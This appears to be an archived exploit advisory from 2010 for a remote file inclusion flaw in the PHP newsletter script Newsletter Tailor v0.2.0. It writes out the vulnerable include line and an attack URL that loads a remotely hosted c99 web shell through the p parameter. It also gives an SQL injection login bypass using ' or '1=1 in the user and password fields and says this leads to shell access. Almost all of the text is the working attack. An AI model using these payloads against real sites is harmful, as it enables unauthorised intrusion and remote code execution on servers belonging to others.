id: 10815
date: 02/09/2010
title: Newsletter Tailor v0.2.0 RFI Vulnerability
author: Snakespc
cves: 

==========================================
Newsletter Tailor v0.2.0 RFI Vulnerability
==========================================

==============================================================================
[»] Newsletter Tailor Remote File Include Vulnerability
==============================================================================
  
[»] Script:   [ Newsletter Tailor ]
[»] Language: [ PHP ]
[»] Download: [ http://sourceforge.net/projects/nlettertailor/ ]
  
###########################################################################
 ===[ Exploit ]=== include($p.".php");
  
[»] http://server/list/admin/index.php?p=http://localhost/c99.txt?
[»]Note: When you update the page prompts you to log on
[»](Auth Bypass) SQL Injection :user:' or '1=1  pass:' or '1=1
Then be accessed on the "sh3ll"
Author: Snakespc <-
###########################################################################



#  0day.today [2023-03-26]  #